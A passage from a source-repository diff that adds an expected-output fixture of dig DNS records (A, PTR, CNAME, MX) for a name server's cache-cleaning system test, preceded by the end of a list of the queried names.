IN A +NS2.EXODUS.net. IN A +NS2.SCRUZ.net. IN A +NS.PIPEX-SZ.net. IN A +saturn.SUN.com. IN A +e24.nc.us.IBM.com. IN A +NMS.CYFRONET.KRAKOW.PL. IN A +NS.TWNIC.net. IN A +ns2.alcatel.NO. IN A +INPAKSODNS.AKSO.nps.GOV. IN A +mail.reptiles.org. IN A +59.187.152.204.IN-ADDR.ARPA. IN PTR +ns1.mobydark.com. IN A +NS.KG. IN A +NS.SPB.SU. IN A +PENDRAGON.CS.PURDUE.EDU. IN A +NS1.IGC.APC.org. IN A +USDNS.NIC.us. IN A +NS2.WEBTRENDS.com. IN A +URANUS.DAIMI.AAU.DK. IN A +ANTANA.IRD.MG. IN A +NS.JERSEY.juno.com. IN A +NS2.INTERNET-TOOLS.com. IN A +ns-tk012.ocn.AD.JP. IN A +bvt-ext.gdarm.com. IN A +NS1.ID. IN A +NS2.MAHNET.net. IN A +NS.ALCANET.COM.AU. IN A +UTAMA.BOLNET.BO. IN A +NS.CNC.AC.CN. IN A +NS.KREN.NE.KR. IN A +NS1.REDHAT.com. IN A +db.rc.VIX.com. IN A +198.103.198.209.IN-ADDR.ARPA. IN CNAME +alf.pbks.PL. IN A +FLAG.EP.net. IN A +DNS2.IUNET.IT. IN A +NS2.QUANTIFIED.net. IN A +INTERNET-SERVER.ZURICH.IBM.com. IN A +seaipsvcs.idx.com. IN A +lebanon.valley.net. IN A +SERVER.NORDU.net. IN A +NS.NIC.DO. IN A +isc-01.iscvt.org. IN A +NAC.NO. IN A +SAVA.UTIC.NET.BA. IN A +NS1.TOKYO.JP.NETDNS.com. IN A +NETSERV2.ITS.rpi.EDU. IN A +IFI.UIO.NO. IN A +www.TOAPLAN.com. IN A +ns2.the-frontier.org. IN A +NS.UNAM.MX. IN A +ARISTO.TAU.AC.IL. IN A +DNS.CS.WISC.EDU. IN A +NS1.NIC.IR. IN A +NS1.RETINA.AR. IN A +mailer.connriver.net. IN A +NS.ATI.TN. IN A +NS2.CLEAR.NET.NZ. IN A +NS4.EARTHLINK.net. IN A +mejac.palo-alto.ca.us. IN A +New-York4.NY.ALTER.net. IN A +falcon.tallship.net. IN A +ZEUS.CC.UCY.AC.CY. IN A +NS2.SECURE.net. IN A +NS0.FLIRBLE.org. IN A +dns.zenon.net. IN A +SERVIDOR.MICROASTUR.ES. IN A +DOWNSTAGE.MCS.VUW.AC.NZ. IN A +ns2.GNAC.com. IN A +PRIFI.EUNET.FI. IN A +ns2.k12.vt.us. IN A +ns2.nic.mnet. IN A +NS0.PIPEX.net. IN A +NS1.SANFRANCISCO.US.NETDNS.com. IN A +AMRA.NIC.GOV.JO. IN A +kw.com.CN. IN MX +SHNS.163.net. IN A +NS.ER.USGS.GOV. IN A +FAITH.MYNET.net. IN A +mail.smuggs.com. IN A +MIMOS.MY. IN A +NS.GU. IN A +mx00.schlund.de. IN A +CADDSYS.IPTEK.net. IN A +NS0.TELIA.NIC.NU. IN A +NS2.GRANITECANYON.com. IN A +GATEKEEPER.corning.com. IN A +NS2.2DAY.com. IN A +1.0.0.127.IN-ADDR.ARPA. IN PTR +RAIN.PSG.com. IN A +STRAWB.MIT.EDU. IN A +NS2.DIGISERVE.com. IN A +UMACSN2.UMAC.MO. IN A +NS.JM. IN A +12.153.66.206.IN-ADDR.ARPA. IN PTR +EAST.ISI.EDU. IN A +NS2.UUNET.CA. IN A +SUNNY.STAT-USA.GOV. IN A +BOW.INTNET.CF. IN A +NS4.TELE.DK. IN A +NS2.sodak.net. IN A +NS1.NEWYORK.US.NETDNS.com. IN A +NS2.PSI.net. IN A +NS.KREONET.RE.KR. IN A +GIANT.MINDLINK.net. IN A +NS0.SECTOR001.org. IN A +DNS.SEABONE.net. IN A +NS2.MANA.PF. IN A +NRWEB.CENPAC.NET.NR. IN A +www.TRAVELPHOTOCONTESTS.com. IN A +NS1.REGEX.com. IN A +BIGBIRD.ITD.nps.GOV. IN A +CUNIXD.CC.COLUMBIA.EDU. IN A +NS1.CLASSIFIEDMONSTER.com. IN A +SERVER1.SANS.org. IN A +BRONZE.COIL.com. IN A +SCSNMS.SWITCH.CH. IN A +SCE.CNC.UNA.PY. IN A +RELAY.LA.TIS.com. IN A +NS.AUSTIN.IBM.com. IN A +SERVICE.robert-morris.EDU. IN A +MERCURY.ML.org. IN A +proxy.pccf.net. IN A +DUB-NAME-SVC-1.compuserve.com. IN A +NS.CNRI.reston.va.us. IN A +NS.UCAD.SN. IN A +ns01.ny.us.ibm.net. IN A +NS4-AUTH.ALASKA.net. IN A +BOW.INTNET.NE. IN A +NS-JP.SINET.AD.JP. IN A +ns.musin.de. IN A +ip1.romkey.SEG.net. IN A +DNS2.ITD.UMICH.EDU. IN A +mail.rpi.EDU. IN A +INECO.NIC.ES. IN A +DNS2.FIREHOUSE.net. IN A +BOW.INTNET.BJ. IN A +sundown.vtc.VSC.EDU. IN A +NIC.AIX.GR. IN A +NIC.AD.JP. IN A +NS.DC.IGC.org. IN A +LHR.NS.GDNS.net. IN A +NS2.WEBMAGIC.net. IN A +MUNNARI.OZ.AU. IN A +HIPPO.RU.AC.ZA. IN A +PEBBLES.IOM.com. IN A +penpal.dmz.RPSLMC.EDU. IN A +netnews.HINET.net. IN A +INS2.TOSA.TWTELECOM.net. IN A +proxy6.cisco.com. IN A +NS2.HOST4U.net. IN A +POIPARAU.OYSTER.NET.CK. IN A +NS-EXT.VIX.com. IN A +NS2.NURSAT.net. IN A +mail2.kw.com.CN. IN A +NS-02B.ANS.net. IN A +DNS.RCCN.net. IN A +B.ROOT-SERVERS.ORSC. IN A +FIREHOUSE.net. IN A diff --git a/bin/tests/system/cacheclean/knowngood.dig.out b/bin/tests/system/cacheclean/knowngood.dig.out new file mode 100644 index 0000000..a0f087e --- /dev/null +++ b/bin/tests/system/cacheclean/knowngood.dig.out @@ -0,0 +1,953 @@ +YA.AKAMAI.com. 604800 IN A 204.178.118.68 +UPR1.UPR.CLU.EDU. 604800 IN A 136.145.1.4 +integra.s-integra.co.JP. 604800 IN A 210.162.202.34 +avalon.iks-jena.de. 604800 IN A 194.221.90.34 +NS1.GLOBALDNS.com. 604800 IN A 206.253.214.11 +NS.RDU.BELLSOUTH.net. 604800 IN A 205.152.32.20 +ns.space.net. 604800 IN A 195.30.0.1 +SUN.MHS-RELAY.AC.UK. 604800 IN A 128.86.8.25 +AYAX.UNIANDES.EDU.CO. 604800 IN A 157.253.50.30 +DNS.NIC.CD. 604800 IN A 194.38.74.11 +NS.DNS.PT. 604800 IN A 193.136.0.1 +NS1.INTERNETSHARE.com. 604800 IN A 63.207.108.53 +MASTER.DNS.BE. 604800 IN A 194.7.171.243 +CATAMOUNT.middlebury.EDU. 604800 IN A 140.233.2.204 +FM03.FM. 604800 IN A 206.49.89.4 +NAAMAK.NCST.ERNET.IN. 604800 IN A 202.41.110.66 +gateway2.BFG.com. 604800 IN A 166.102.214.66 +NS3.NS.ESAT.net. 604800 IN A 192.111.39.100 +DNS1.INTUIT.com. 604800 IN A 208.157.255.4 +DEN-NS2.FWIDCSERVICES.net. 604800 IN A 216.7.160.32 +SOL.UNDPBI.TELEPAC.net. 604800 IN A 194.65.87.2 +NS2.tridog.com. 604800 IN A 206.168.112.51 +DNS2.KW. 604800 IN A 161.252.48.150 +NS2.MAIL.com. 604800 IN A 165.251.1.3 +NS.FIRSTCOM.CL. 604800 IN A 200.27.2.2 +DNS4.QUICKEN.com. 604800 IN A 198.3.99.252 +bofh.cid.net. 604800 IN A 212.172.21.254 +NS1.KRNIC.net. 604800 IN A 202.30.50.51 +NS2.SR.net. 604800 IN A 200.1.156.11 +NS1.TELSTRA.net. 604800 IN A 139.130.4.5 +ns.cafax.SE. 604800 IN A 192.71.228.17 +NS1.DNS.NET.NZ. 604800 IN A 202.46.161.3 +NS.CONCOURSE.com. 604800 IN A 199.218.113.2 +35.32/27.110.16.12.IN-ADDR.ARPA. 604800 IN PTR mail.nova-data.com. +CCC.champcable.com. 604800 IN A 207.41.53.11 +NS.RIPE.net. 604800 IN A 193.0.0.193 +NS.NIC.NU. 604800 IN A 128.11.47.50 +KIM.CAMNET.CM. 604800 IN A 195.24.192.35 +DOGON.SOTELMA.net. 604800 IN A 208.144.230.1 +DNS02.FLAME.org. 604800 IN A 204.152.184.97 +NS.MIA.BELLSOUTH.net. 604800 IN A 205.152.16.20 +mail.ok.RU. 604800 IN A 195.2.83.162 +NS.NIC.MX. 604800 IN A 200.23.1.1 +NS2.BERKELEY.EDU. 604800 IN A 128.32.136.12 +NS2.BERKELEY.EDU. 604800 IN A 128.32.206.12 +SHIKHAR.MOS.COM.NP. 604800 IN A 202.52.255.5 +noc.rrz.Uni-Koeln.de. 604800 IN A 134.95.100.209 +NS.KORNET.net. 604800 IN A 168.126.63.1 +keith.gazpacho.org. 604800 IN A 209.67.235.37 +NS2.appliedtheory.com. 604800 IN A 168.75.17.11 +NS.CERNET.net. 604800 IN A 202.112.0.44 +smtp.ELISTX.com. 604800 IN A 209.116.252.130 +NS-AIT.THNIC.net. 604800 IN A 192.41.170.219 +from.PL. 604800 IN A 212.160.132.114 +mailhub.icann.org. 604800 IN A 192.0.34.33 +SEC1.DNS.UK.PSI.net. 604800 IN A 154.32.105.34 +isrv3-i.isc.org. 604800 IN A 204.152.184.87 +PHLOEM.UOREGON.EDU. 604800 IN A 128.223.32.35 +CTINA.AR. 604800 IN A 200.16.97.17 +DNS2.IAM.NET.MA. 604800 IN A 212.217.0.12 +10.126.39.137.IN-ADDR.ARPA. 604800 IN PTR Fddi0-0.New-York4.NY.ALTER.NET. +DNS.PRINCETON.EDU. 604800 IN A 128.112.129.15 +NS.BELLSOUTH.net. 604800 IN A 205.152.0.5 +NS1.SNS-FELB.DEBIS.com. 604800 IN A 53.122.1.10 +localhost. 604800 IN A 127.0.0.1 +hm6.vt.highmeadow.com. 604800 IN A 207.136.209.6 +SYRUP.hill.com. 604800 IN A 208.162.106.3 +NS99.WAIKATO.AC.NZ. 604800 IN A 130.217.76.27 +NS4.CW.net. 604800 IN A 204.70.49.234 +NS2.SLOWMOE.com. 604800 IN A 137.118.8.50 +ns2.hypa.net. 604800 IN A 63.160.181.11 +ns.sxtyptt.NET.CN. 604800 IN A 202.99.192.68 +NS2.MERCHANTWARE.com. 604800 IN A 209.170.142.35 +uunymdgds1.DOUBLECLICK.net. 604800 IN A 206.65.183.21 +e34.co.us.IBM.com. 604800 IN A 32.97.110.132 +kista.dns.swip.net. 604800 IN A 192.71.220.9 +ZEBRA.UEM.MZ. 604800 IN A 196.3.96.67 +NET2.GENDYN.com. 604800 IN A 204.60.171.9 +NS0.UTK.EDU. 604800 IN A 160.36.0.66 +NS.RELCOM.EU.net. 604800 IN A 193.124.23.3 +DNS0.AXION.BT.CO.UK. 604800 IN A 132.146.5.1 +mail.vhv.com. 604800 IN A 208.5.161.11 +DNS4.UK.MSFT.net. 604800 IN A 213.199.144.152 +NS2.ADNS.net. 604800 IN A 199.5.157.3 +NS1.SEATTLE.US.NETDNS.com. 604800 IN A 206.253.214.13 +NS2.UNIVIE.AC.at. 604800 IN A 193.171.255.66 +NS15B.BOCA15-VERIO.com. 604800 IN A 208.55.91.51 +www.BAYAREA.com. 604800 IN CNAME vh80040.vh8.infi.net. +ns4.onemain.com. 604800 IN A 63.208.210.11 +NS2.EDIGITALS.com. 604800 IN A 211.39.139.36 +MICHAEL.VATICAN.VA. 604800 IN A 212.77.0.2 +AUSTIN.GH.com. 604800 IN A 196.3.64.1 +sld-ns2.CNNIC.NET.CN. 604800 IN A 202.97.16.197 +NS2.CDC.GOV. 604800 IN A 198.246.96.92 +NS.WATSON.IBM.com. 604800 IN A 198.81.209.2 +NS.NIC.SH. 604800 IN A 194.205.62.60 +NS2.BAHNHOF.net. 604800 IN A 212.85.64.4 +NS-AUTH2.cmates.com. 604800 IN A 208.23.213.3 +ISDMNL.WR.USGS.GOV. 604800 IN A 130.118.4.2 +NS2.COBEX.net. 604800 IN A 207.102.129.72 +MERLE.CIRA.CA. 604800 IN A 64.26.149.98 +NS.UVG.EDU.GT. 604800 IN A 168.234.68.2 +NS1.CWVA.DOUBLECLICK.net. 604800 IN A 205.138.3.20 +eliot.diebold.com. 604800 IN A 204.151.249.21 +NS.ALMADEN.IBM.com. 604800 IN A 198.4.83.35 +NS2.INTERNETSQUARE.com. 604800 IN A 205.227.232.9 +mail.QUEST-NET.com. 604800 IN A 207.140.30.11 +Z1.NS.LHR1.GLOBIX.net. 604800 IN A 212.111.32.38 +DNS1.AVANTEL.NET.MX. 604800 IN A 200.33.213.66 +vh80040.vh8.INFI.net. 604800 IN A 209.97.59.245 +NS.LEB.net. 604800 IN A 206.127.55.2 +NS.DCC.UCHILE.CL. 604800 IN A 146.83.5.204 +CLOUSO.RISQ.QC.CA. 604800 IN A 192.26.210.1 +muenster.westfalen.de. 604800 IN A 193.174.5.2 +us.a1.YIMG.com. 604800 IN CNAME a32.g.a.YIMG.com. +NS.DEMOS.SU. 604800 IN A 194.87.0.8 +NS.DEMOS.SU. 604800 IN A 194.87.0.9 +south.NAVPOINT.com. 604800 IN A 207.106.42.12 +netconsult.netconx.de. 604800 IN A 193.141.75.1 +DNS2.btinternet.com. 604800 IN A 194.73.73.94 +NS2.CINE.net. 604800 IN A 207.168.250.12 +castor.cmc.ec.gc.CA. 604800 IN A 142.135.4.14 +EX2-DNS0.AVENUEA.com. 604800 IN A 216.34.88.20 +firewall3.glaxowellcome.com. 604800 IN A 192.58.204.207 +MACU.MA.MT.NP.ELS-GMS.att.net. 604800 IN A 199.191.145.136 +NS.PA. 604800 IN A 168.77.8.2 +TGSERV.TELE.GL. 604800 IN A 194.177.224.7 +KYNSE02.MESSAGESECURE.com. 604800 IN A 216.142.252.201 +GORGON.XTRA.CO.NZ. 604800 IN A 202.27.158.34 +DNS.NIC.IT. 604800 IN A 193.205.245.5 +pop.VERMONTEL.net. 604800 IN CNAME loomis.VERMONTEL.net. +NS2.REGISTRY.HM. 604800 IN A 209.54.168.55 +NAMESERVER1.CONCENTRIC.net. 604800 IN A 207.155.183.73 +47.131.127.204.IN-ADDR.ARPA. 604800 IN PTR mtiwmhc22.worldnet.att.net. +mailhost.tfm.com. 604800 IN A 192.231.224.11 +NS1.MRC.GM. 604800 IN A 212.60.69.1 +NS.WIDE.AD.JP. 604800 IN A 203.178.136.63 +NS.BTA.NET.CN. 604800 IN A 202.96.0.133 +NS2.ISPC.org. 604800 IN A 209.124.64.11 +BOW.RAIN.FR. 604800 IN A 194.51.3.49 +srs.srs.state.vt.us. 604800 IN A 159.105.101.150 +NS4.WEB2010.com. 604800 IN A 216.157.55.6 +NS.TELECOM.NET.ET. 604800 IN A 196.27.22.43 +NS1.DNS.NET.KH. 604800 IN A 203.127.100.21 +GATEN.JARING.MY. 604800 IN A 161.142.227.17 +shell.nominum.com. 604800 IN A 204.152.187.59 +CHEOPS.ANU.EDU.AU. 604800 IN A 150.203.224.24 +VANGOGH.CS.BERKELEY.EDU. 604800 IN A 128.32.33.5 +NS2.NOC.NULLUS.net. 604800 IN A 63.119.253.254 +NIC.LTH.SE. 604800 IN A 130.235.20.3 +ns.farm.net. 604800 IN A 216.112.179.160 +NS.USEC.SUN.com. 604800 IN A 192.9.48.3 +NS2.YOUR-DOMAIN.com. 604800 IN A 216.167.31.177 +DNS-EAST.PREP.net. 604800 IN A 129.250.252.10 +ns.hcr.net. 604800 IN A 208.240.246.4 +NS-RCH.nortelnetworks.com. 604800 IN A 192.135.215.2 +crl.DEC.com. 604800 IN A 192.58.206.2 +NS.PIXAR.ES. 604800 IN A 194.143.196.3 +MEX1-M-213.UNINET.NET.MX. 604800 IN A 200.33.146.213 +NS.ITU.CH. 604800 IN A 156.106.192.121 +matrix.uwm.EDU.PL. 604800 IN A 213.184.3.136 +gateway1.gmcr.com. 604800 IN A 12.34.108.130 +NS2.DNS.BR. 604800 IN A 200.19.119.99 +foxharp.boston.MA.us. 604800 IN MX 10 bparker.connactivity.com. +Quest-7.symquest.com. 604800 IN A 64.69.102.131 +NS2.VERIO.net. 604800 IN A 129.250.31.190 +NAME.IAD.GBLX.net. 604800 IN A 204.152.166.155 +NS2.EMIRATES.NET.AE. 604800 IN A 194.170.1.7 +supai.oit.UMASS.EDU. 604800 IN A 128.119.175.6 +QUERN.EPILOGUE.com. 604800 IN A 128.224.1.136 +NS3.TOPICA.com. 604800 IN A 206.111.131.72 +NS1.JERKY.net. 604800 IN A 204.57.55.100 +JTB.BRUNET.BN. 604800 IN A 202.160.8.2 +AUTH100.NS.UU.net. 604800 IN A 198.6.1.202 +BOW.INTNET.DJ. 604800 IN A 193.251.143.253 +OSI2.GUA.net. 604800 IN A 205.161.188.3 +AZMODAN.ULA.VE. 604800 IN A 150.185.130.16 +THUMPER.RPSLMC.EDU. 604800 IN A 144.74.22.8 +ICHU.RCP.NET.PE. 604800 IN A 161.132.5.14 +NS.NIC.AC. 604800 IN A 194.205.62.120 +DNS.NETFLIGHT.com. 604800 IN A 207.88.32.2 +ns2.UTORONTO.CA. 604800 IN A 128.100.102.202 +mail.giffordmed.org. 604800 IN A 130.189.100.51 +RATA.VUW.AC.NZ. 604800 IN A 130.195.2.11 +NS-2.ADMONITOR.net. 604800 IN A 216.35.185.40 +NCC.MOC.KW. 604800 IN A 196.1.69.98 +NS.EUNET.ES. 604800 IN A 193.127.1.11 +NS3.best.com. 604800 IN A 209.24.149.42 +zip.MAIL-LIST.com. 604800 IN MX 5 zip.MAIL-LIST.com. +zip.MAIL-LIST.com. 604800 IN MX 20 sluice.MAIL-LIST.com. +zip.MAIL-LIST.com. 604800 IN MX 20 pipeline.MAIL-LIST.com. +zip.MAIL-LIST.com. 604800 IN MX 20 transport.MAIL-LIST.com. +zip.MAIL-LIST.com. 604800 IN MX 50 brisk.MAIL-LIST.com. +zip.MAIL-LIST.com. 604800 IN MX 50 swifty.MAIL-LIST.com. +zip.MAIL-LIST.com. 604800 IN MX 50 velocity.MAIL-LIST.com. +JATZ.AARNET.EDU.AU. 604800 IN A 139.130.204.4 +DNS2.MAN.LODZ.PL. 604800 IN A 212.51.192.5 +NS.VERITAS.com. 604800 IN A 204.177.156.38 +218.241.103.199.IN-ADDR.ARPA. 604800 IN PTR abyssinian.sleepycat.com. +BOW.SNPT.KM. 604800 IN A 195.101.19.253 +Z1.NS.SJC1.GLOBIX.net. 604800 IN A 209.10.34.55 +DNS.NIC.TT. 604800 IN A 24.3.198.194 +MAKISIG.IPHIL.net. 604800 IN A 203.176.28.135 +NS.DK.net. 604800 IN A 193.88.44.42 +NS.NI. 604800 IN A 200.30.36.8 +NS.NI. 604800 IN A 165.98.1.2 +CIUP1.NCC.UP.PT. 604800 IN A 193.136.51.52 +ns2.verisign-grs.com. 604800 IN A 198.41.3.108 +NS1.UMASS.EDU. 604800 IN A 128.119.166.14 +NS.NEWACCOUNT.net. 604800 IN A 216.121.96.26 +UDNS2.ULTRADNS.net. 604800 IN A 204.74.101.1 +NS2.LATNET.LV. 604800 IN A 159.148.108.1 +info-server.surrey.AC.UK. 604800 IN A 131.227.102.6 +NS2.SQUONK.net. 604800 IN A 63.84.12.135 +NS2.DSO.net. 604800 IN A 206.16.77.11 +www.energyenhancement.org. 604800 IN A 216.121.175.228 +DNS1.BD. 604800 IN A 209.58.24.5 +nl.COMPUWARE.com. 604800 IN MX 150 uucp.nl.net. +nl.COMPUWARE.com. 604800 IN MX 50 bitbucket.extern.uniface.nl. +nl.COMPUWARE.com. 604800 IN MX 100 smtp.nl.net. +NS.DHIRAAGU.MV. 604800 IN A 202.1.192.196 +TRANTOR.UMD.EDU. 604800 IN A 128.8.10.14 +NS.ALCANET.NO. 604800 IN A 193.213.238.10 +Z6.MSFT.AKADNS.com. 604800 IN A 207.229.152.20 +NS4.ync.net. 604800 IN A 206.185.20.9 +CMTU.MT.NS.ELS-GMS.att.net. 604800 IN A 12.127.16.69 +vh40099.vh4.INFI.net. 604800 IN A 209.97.59.121 +ns2.secondary.nl. 604800 IN A 194.229.138.6 +abyssinian.sleepycat.com. 604800 IN A 199.103.241.218 +APHEX.MENTOR.BE. 604800 IN A 193.121.64.5 +webmail.fiberia.com. 604800 IN A 216.55.147.2 +localhost.moonmothers.com. 604800 IN A 127.0.0.1 +NS2.DNS.LU. 604800 IN A 158.64.229.3 +NS.VISUALCOM.ES. 604800 IN A 194.143.202.202 +TONIC.TO. 604800 IN A 206.184.59.10 +NS1.CRSNIC.net. 604800 IN A 198.41.3.39 +trurl.ispid.com.PL. 604800 IN A 195.150.99.3 +datingagentur.de. 604800 IN A 212.227.216.57 +NS2.NSIREGISTRY.net. 604800 IN A 198.41.3.108 +ICE.VIA-NET-WORKS.IE. 604800 IN A 212.17.32.2 +sgi1.map.com. 604800 IN A 204.71.19.20 +NS0.HS0.U-NET.net. 604800 IN A 194.119.128.70 +candle.pha.pa.us. 604800 IN A 162.33.245.46 +NS1.PACIFIC.NET.SG. 604800 IN A 192.169.33.3 +NS.CENIAI.NET.CU. 604800 IN A 169.158.128.136 +NS2.UUCP.NE.JP. 604800 IN A 210.141.111.69 +za.akamaitech.net. 604800 IN A 204.178.107.226 +NS.UCR.AC.CR. 604800 IN A 163.178.88.2 +DNS-02.NS.cs.com. 604800 IN A 205.188.157.235 +dns2.primary.net. 604800 IN A 205.242.187.235 +PAPPSRV.PAPP.UNDP.org. 604800 IN A 192.115.229.1 +NS1.REGME.com. 604800 IN A 207.153.57.14 +DNS.CS.KULEUVEN.AC.BE. 604800 IN A 134.58.40.4 +NS1.VERMONTLAW.net. 604800 IN A 63.89.26.15 +mail.garmontusa.com. 604800 IN A 64.30.8.178 +NS2.SAIPAN.com. 604800 IN A 202.128.28.2 +NS.ARICATRA.com. 604800 IN A 206.64.112.114 +ns2.reedmedia.net. 604800 IN A 209.241.86.6 +NS.NETLAB.SK. 604800 IN A 195.168.1.4 +RELAY.GW.tislabs.com. 604800 IN A 192.94.214.100 +b.ns.tmcs.net. 604800 IN A 209.104.33.252 +NS1.IBL.BM. 604800 IN A 199.172.192.1 +ok.RU. 604800 IN A 195.2.83.162 +NS.RICC.ALMA-ATA.SU. 604800 IN A 194.87.112.4 +KITKA.MARNET.MK. 604800 IN A 194.149.131.2 +dasher.dartmouth.EDU. 604800 IN A 129.170.208.6 +NS0.PLANET-THREE.com. 604800 IN A 212.49.219.164 +KNOCK.SER.BBNPLANET.net. 604800 IN A 192.239.16.129 +tornado.webtech.elk.PL. 604800 IN A 212.244.162.100 +AUTH2.NS.IDT.net. 604800 IN A 169.132.133.1 +host3.VTLEGALAID.org. 604800 IN A 207.136.208.115 +NS.EUNET.SK. 604800 IN A 192.108.130.33 +TULKU.NIC.AR. 604800 IN A 200.16.97.77 +RELAY.CDNNET.CA. 604800 IN A 192.73.5.1 +DNS2.TPSA.PL. 604800 IN A 194.204.152.34 +enterprise.wirbel.com. 604800 IN A 194.231.54.2 +ECNET.EC. 604800 IN A 157.100.45.2 +ENGINE1.UNA.net. 604800 IN A 208.136.52.74 +WYCU.WY.BR.NP.ELS-GMS.att.net. 604800 IN A 199.191.128.43 +ARWENA.NASK.WAW.PL. 604800 IN A 193.59.201.28 +PAC2.NIPR.MIL. 604800 IN A 199.252.155.234 +DAISY.EE.UND.AC.ZA. 604800 IN A 146.230.192.18 +odin.ietf.org. 604800 IN A 132.151.1.176 +dns.kaben-net.de. 604800 IN A 195.179.28.17 +NS2.ALTAVISTA.com. 604800 IN A 209.73.164.7 +CASTOR.TELEGLOBE.net. 604800 IN A 199.202.55.2 +CIR.RED.SV. 604800 IN A 168.243.254.1 +PIJIN.COM.SB. 604800 IN A 202.139.42.10 +NS4.CTCCOM.net. 604800 IN A 64.69.100.35 +NS1.SOL.NO. 604800 IN A 195.225.2.10 +DNS2.TK.MSFT.net. 604800 IN A 207.46.232.38 +NS.BSDI.com. 604800 IN A 207.174.116.8 +NS.SVIANED.nl. 604800 IN A 143.177.1.3 +NS.NOVELL.com. 604800 IN A 137.65.1.1 +NS.LUCKY.net. 604800 IN A 193.193.193.100 +SJC-NS2.SJC.LYCOS.com. 604800 IN A 206.79.171.40 +NS1.OP.net. 604800 IN A 209.152.193.4 +worldnet.att.net. 604800 IN A 199.70.151.234 +APIES.FRD.AC.ZA. 604800 IN A 137.214.80.1 +mail.skiinsurance.com. 604800 IN A 207.136.205.152 +NS.BELNET.BE. 604800 IN A 193.190.198.2 +NS.BELNET.BE. 604800 IN A 193.190.198.10 +KOMO.INET.GA. 604800 IN A 208.148.44.1 +EARTH.THEPLANET.net. 604800 IN A 195.92.195.222 +VASCO.USMA.AC.PA. 604800 IN A 208.141.92.2 +GODFEVER.DCCSERVER.com. 604800 IN A 208.137.22.6 +BOS-NS2.BOS.LYCOS.com. 604800 IN A 209.67.228.40 +NS2.GOTO.com. 604800 IN A 204.71.128.137 +NS1.overstock.com. 604800 IN A 207.225.194.13 +NS1-PUBLIC.ZMA.COMPAQ.com. 604800 IN A 161.114.64.24 +ns.ilovedomain.com. 604800 IN A 211.175.164.170 +ns1.anycast.net. 604800 IN A 216.196.51.4 +PASCAL.UPRR.PR. 604800 IN A 134.202.1.120 +NS3-AUTH.SPRINTLINK.net. 604800 IN A 144.228.255.10 +NS1-Y.DNS.PIPEX.net. 604800 IN A 158.43.193.89 +prue.eim.surrey.AC.UK. 604800 IN A 131.227.76.5 +TROLL-GW.GATECH.EDU. 604800 IN A 130.207.244.251 +NS.SIERRATEL.SL. 604800 IN A 194.133.124.5 +ns2.PSHIFT.com. 604800 IN A 208.153.85.21 +NS.ERS.IBM.com. 604800 IN A 204.146.173.35 +ASLAN.OPEN-RSC.org. 604800 IN A 199.5.157.128 +NS2.DOMAIN-REGISTRY.nl. 604800 IN A 193.176.144.130 +uranus.lan-ks.de. 604800 IN A 194.45.71.1 +mail.unlisys.net. 604800 IN A 195.21.255.252 +NS.AUSTRIA.EU.net. 604800 IN A 192.92.138.35 +AUTH01.CONNECT.IE. 604800 IN A 194.106.128.50 +SUN.SCSI.GOV.BY. 604800 IN A 195.50.5.103 +NS1.SIGMAHOSTING.com. 604800 IN A 209.241.86.6 +NS.CAST.EDU.JM. 604800 IN A 200.9.115.2 +DS.NIC.NET.SG. 604800 IN A 202.42.194.205 +PRADES.CESCA.ES. 604800 IN A 192.94.163.152 +ns.sta.NET.CN. 604800 IN A 202.96.199.133 +NSE00.excite.com. 604800 IN A 198.3.102.250 +NS3.ABOVE.net. 604800 IN A 207.126.105.146 +CASBAH.ELDJAZAIR.NET.DZ. 604800 IN A 193.194.81.45 +ASKIA.SOTELMA.ML. 604800 IN A 208.144.230.3 +NS.IDT.net. 604800 IN A 198.4.75.100 +FXCLPR02.IS.CHRYSLER.com. 604800 IN A 204.189.94.37 +SVC00.APNIC.net. 604800 IN A 202.12.28.131 +NS5.DCX.YAHOO.com. 604800 IN A 216.32.74.10 +ns1.ray.net. 604800 IN A 195.238.228.131 +NS.NIC.MC. 604800 IN A 195.78.6.131 +ns.runway.CN.net. 604800 IN A 211.101.132.8 +benoni.uit.NO. 604800 IN A 129.242.4.254 +SCRATCHY.MINDSPRING.net. 604800 IN A 207.69.200.211 +ns1.pcode.com. 604800 IN A 216.15.192.135 +ns1.aha.RU. 604800 IN A 195.2.80.142 +ns2.uwaterloo.CA. 604800 IN A 129.97.128.100 +ns2.NIC.AD.JP. 604800 IN A 202.12.30.133 +a.ns.foxharp.boston.MA.us. 604800 IN A 24.147.209.205 +NS.NIC.IO. 604800 IN A 194.205.62.100 +A-GTLD-SERVERS.dot-god.com. 604800 IN A 205.189.73.123 +SMTP.slac.stanford.EDU. 604800 IN A 134.79.18.80 +52.87.198.209.IN-ADDR.ARPA. 604800 IN PTR mqueue0.sover.net. +BARNEY.ADVSYS.CO.UK. 604800 IN A 194.72.124.2 +NS1.TELEPAC.PT. 604800 IN A 194.65.3.20 +NICOSIA.CCS.UCY.AC.CY. 604800 IN A 194.42.6.97 +NS.PUNCHDOWN.org. 604800 IN A 140.174.131.100 +SYNAESTHESIA.COGNOSCENTI.org. 604800 IN A 207.208.112.4 +NS2.PLANET-THREE.net. 604800 IN A 212.49.219.190 +DNS.CIT.CORNELL.EDU. 604800 IN A 192.35.82.50 +MODOR.VERISIGN.net. 604800 IN A 205.139.94.55 +SUNSTROKE.IS.RPSLMC.EDU. 604800 IN A 144.74.21.8 +NS2.SEG.net. 604800 IN A 206.34.181.16 +NEMUNAS.SC-UNI.KTU.LT. 604800 IN A 193.219.32.13 +MULGA.CS.MU.OZ.AU. 604800 IN A 128.250.1.22 +MULGA.CS.MU.OZ.AU. 604800 IN A 128.250.37.150 +NS1.NPLUS.GF. 604800 IN A 195.6.144.3 +ns2.centralinfo.net. 604800 IN A 63.102.204.130 +K.GTLD-SERVERS.net. 604800 IN A 213.177.194.5 +ns1.codelocal.com. 604800 IN A 216.15.192.130 +NS2.IPNS.com. 604800 IN A 63.230.183.1 +NS0.DE.NIC.NU. 604800 IN A 216.200.116.40 +NS.USSR.EU.net. 604800 IN A 193.124.22.65 +NS.INTERNET.SK. 604800 IN A 192.108.130.91 +CORREOS.SEKER.ES. 604800 IN A 194.179.87.1 +mx1.buf.ADELPHIA.net. 604800 IN A 24.48.36.10 +aun.UNINETT.NO. 604800 IN A 129.241.1.99 +NS0.NETANET.com. 604800 IN A 195.172.127.72 +NS0.NETANET.com. 604800 IN A 194.6.96.218 +www.MANY-PATHS-ENERGY-ENHANCEMENT.com. 604800 IN A 66.33.4.50 +NS2.STARFIRE.DOUGLAS.MA.us. 604800 IN A 216.129.136.9 +NS3.IKP.PL. 604800 IN A 157.25.5.30 +pns.dtag.de. 604800 IN A 194.25.0.125 +NZ.NS.NIC.NU. 604800 IN A 203.97.132.66 